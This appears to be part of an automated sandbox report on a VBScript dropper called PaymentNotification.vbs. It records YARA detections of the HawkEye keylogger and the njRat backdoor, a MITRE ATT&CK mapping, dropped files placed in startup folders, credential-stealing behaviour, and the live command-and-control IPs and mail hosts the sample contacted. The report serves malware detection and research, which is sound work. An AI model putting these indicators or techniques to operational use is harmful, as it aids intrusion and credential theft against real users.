            Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Source: tmpFB21.tmp.exe.2.drString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: tmpFB21.tmp.exe.2.drString found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: tmpFB21.tmp.exe.2.drString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: tmpFB21.tmp.exe.2.drString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Detected njRatShow sources
            Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs.Net Code: njRat config detected
            Source: 2.2.pgr.exe.80000.0.unpack, OK.cs.Net Code: njRat config detected
            Source: 2.0.pgr.exe.80000.0.unpack, OK.cs.Net Code: njRat config detected
            Yara detected HawkEye KeyloggerShow sources
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
            Yara detected NjratShow sources
            Source: Yara matchFile source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC0A8E listen,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC0FC6 bind,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC0A50 listen,
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_02CC0F93 bind,

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Replication Through Removable Media1Windows Management Instrumentation21Startup Items1Startup Items1Disable or Modify Tools21OS Credential Dumping1Peripheral Device Discovery1Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture11Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsNative API11Scheduled Task/Job1Access Token Manipulation1Scripting121Credentials in Registry2File and Directory Discovery2SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsShared Modules1Registry Run Keys / Startup Folder12Process Injection512Obfuscated Files or Information141Credentials In Files1System Information Discovery17Distributed Component Object ModelInput Capture11Scheduled TransferRemote Access Software2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsExploitation for Client Execution1Network Logon ScriptScheduled Task/Job1Software Packing21LSA SecretsQuery Registry1SSHClipboard Data1Data Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaScheduled Task/Job1Rc.commonRegistry Run Keys / Startup Folder12Masquerading1Cached Domain CredentialsSecurity Software Discovery241VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol113Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion41DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemVirtualization/Sandbox Evasion41Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
            Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 399489 Sample: PaymentNotification.vbs Startdate: 28/04/2021 Architecture: WINDOWS Score: 100 86 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->86 88 Found malware configuration 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 18 other signatures 2->92 9 wscript.exe 16 2->9         started        14 d4c6a6df7bab3dad31763de990c4ed82.exe 5 2->14         started        process3 dnsIp4 66 ia601504.us.archive.org 207.241.227.114, 443, 49699 INTERNET-ARCHIVEUS United States 9->66 52 C:\Users\user\AppData\Local\Temp\pgr.exe, PE32 9->52 dropped 54 C:\Users\user\AppData\Local\Temp\Tmp.exe, PE32 9->54 dropped 110 System process connects to network (likely due to code injection or exploit) 9->110 112 Benign windows process drops PE files 9->112 114 VBScript performs obfuscated calls to suspicious functions 9->114 16 pgr.exe 2 10 9->16         started        20 Tmp.exe 2 5 9->20         started        file5 signatures6 process7 file8 44 C:\...\79c06ef4ef423d882819c4e66285ec85.exe, PE32 16->44 dropped 46 C:\Users\user\AppData\...\tmpFB21.tmp.exe, PE32 16->46 dropped 48 C:\Users\user\AppData\...\tmp87E4.tmp.exe, PE32 16->48 dropped 68 Antivirus detection for dropped file 16->68 70 Multi AV Scanner detection for dropped file 16->70 72 Machine Learning detection for dropped file 16->72 74 Drops PE files to the startup folder 16->74 22 tmpFB21.tmp.exe 16->22         started        26 tmp87E4.tmp.exe 2 16->26         started        28 netsh.exe 1 3 16->28         started        50 C:\Users\user\AppData\Roaming\servieda.exe, PE32 20->50 dropped 76 Detected unpacking (overwrites its own PE header) 20->76 30 servieda.exe 6 20->30         started        signatures9 process10 dnsIp11 58 neesoontat.com.my 103.6.196.196, 49726, 49732, 587 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 22->58 60 whatismyipaddress.com 104.16.154.36, 49724, 80 CLOUDFLARENETUS United States 22->60 64 3 other IPs or domains 22->64 94 Antivirus detection for dropped file 22->94 96 May check the online IP address of the machine 22->96 98 Machine Learning detection for dropped file 22->98 106 5 other signatures 22->106 33 vbc.exe 22->33         started        36 vbc.exe 22->36         started        38 conhost.exe 28->38         started        62 185.140.53.71, 3429, 49705, 49706 DAVID_CRAIGGG Sweden 30->62 56 C:\...\d4c6a6df7bab3dad31763de990c4ed82.exe, PE32 30->56 dropped 100 Multi AV Scanner detection for dropped file 30->100 102 Detected unpacking (overwrites its own PE header) 30->102 104 Drops PE files to the startup folder 30->104 108 2 other signatures 30->108 40 netsh.exe 3 30->40         started        file12 signatures13 process14 signatures15 78 Tries to steal Mail credentials (via file registry) 33->78 80 Tries to steal Instant Messenger accounts or passwords 33->80 82 Tries to steal Mail credentials (via file access) 33->82 84 Tries to harvest and steal browser information (history, passwords, etc) 36->84 42 conhost.exe 40->42         started        process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PaymentNotification.vbs12%VirustotalBrowse
            PaymentNotification.vbs17%ReversingLabsScript-WScript.Dropper.SDrop

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Tmp.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe100%AviraTR/Dropper.Gen7
            C:\Users\user\AppData\Local\Temp\pgr.exe100%AviraTR/Dropper.Gen7
            C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Roaming\servieda.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe100%AviraTR/AD.MExecute.lzrac
            C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe100%AviraSPR/Tool.MailPassView.473
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe100%AviraTR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\Tmp.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\pgr.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\servieda.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Tmp.exe78%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\Tmp.exe83%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
            C:\Users\user\AppData\Local\Temp\pgr.exe91%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\pgr.exe91%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe91%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe91%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
            C:\Users\user\AppData\Roaming\servieda.exe78%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\servieda.exe83%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack100%AviraHEUR/AGEN.1108374Download File
            13.2.tmpFB21.tmp.exe.8a0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
            13.2.tmpFB21.tmp.exe.8a0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
            13.0.tmpFB21.tmp.exe.8a0000.0.unpack100%AviraTR/AD.MExecute.lzracDownload File
            13.0.tmpFB21.tmp.exe.8a0000.0.unpack100%AviraSPR/Tool.MailPassView.473Download File
            1.0.Tmp.exe.1d0000.0.unpack100%AviraTR/Dropper.GenDownload File
            12.0.tmp87E4.tmp.exe.6e0000.0.unpack100%AviraHEUR/AGEN.1135787Download File
            2.2.pgr.exe.80000.0.unpack100%AviraTR/Dropper.Gen7Download File
            3.2.servieda.exe.a0000.0.unpack100%AviraHEUR/AGEN.1108374Download File
            2.0.pgr.exe.80000.0.unpack100%AviraTR/Dropper.Gen7Download File
            12.2.tmp87E4.tmp.exe.6e0000.0.unpack100%AviraHEUR/AGEN.1135787Download File
            3.0.servieda.exe.a0000.0.unpack100%AviraTR/Dropper.GenDownload File
            1.2.Tmp.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1108374Download File
            2.2.pgr.exe.3a3fd88.3.unpack100%AviraTR/Inject.vcoldiDownload File
            15.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1125438Download File
            8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack100%AviraTR/Dropper.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            neesoontat.com.my0%VirustotalBrowse
            81.189.14.0.in-addr.arpa0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.carterandcone.com-E0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/960%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.fontbureau.comtua0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/80%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/80%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/80%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/30%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/vno80%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/wab0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.carterandcone.comafet60%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.fontbureau.comdita0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.carterandcone.comhly#0%Avira URL Cloudsafe
            http://www.carterandcone.comMP_0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/L0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/L0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/L0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
            http://www.fontbureau.comcomF0%URL Reputationsafe
            http://www.fontbureau.comcomF0%URL Reputationsafe
            http://www.fontbureau.comcomF0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/het0%Avira URL Cloudsafe
            http://fontfabrik.com;0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
            http://www.fontbureau.comitu0%URL Reputationsafe
            http://www.fontbureau.comitu0%URL Reputationsafe
            http://www.fontbureau.comitu0%URL Reputationsafe
            http://www.founder.com.cn/cn)0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/G0%Avira URL Cloudsafe
            http://www.carterandcone.comal0%URL Reputationsafe
            http://www.carterandcone.comal0%URL Reputationsafe
            http://www.carterandcone.comal0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/30%Avira URL Cloudsafe
            185.140.53.710%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cnlw0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnm0%URL Reputationsafe
            http://www.founder.com.cn/cnm0%URL Reputationsafe
            http://www.founder.com.cn/cnm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/arge0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/jp/i0%Avira URL Cloudsafe
            http://www.carterandcone.comfacb0%Avira URL Cloudsafe
            http://www.founder.com.cn/cnu0%Avira URL Cloudsafe
            http://www.carterandcone.com;0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            whatismyipaddress.com
            104.16.154.36
            truefalse
              high
              ia601504.us.archive.org
              207.241.227.114
              truefalse
                high
                neesoontat.com.my
                103.6.196.196
                truetrueunknown
                81.189.14.0.in-addr.arpa
                unknown
                unknownfalseunknown
                mail.neesoontat.com.my
                unknown
                unknownfalse
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://whatismyipaddress.com/false
                    high
                    185.140.53.71true
                    • Avira URL Cloud: safe
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.carterandcone.com-EtmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.com/designerstmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                      high
                      http://www.jiyu-kobo.co.jp/96tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.sajatypeworks.comtmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.founder.com.cn/cn/cThetmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.comtuatmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmpfalse
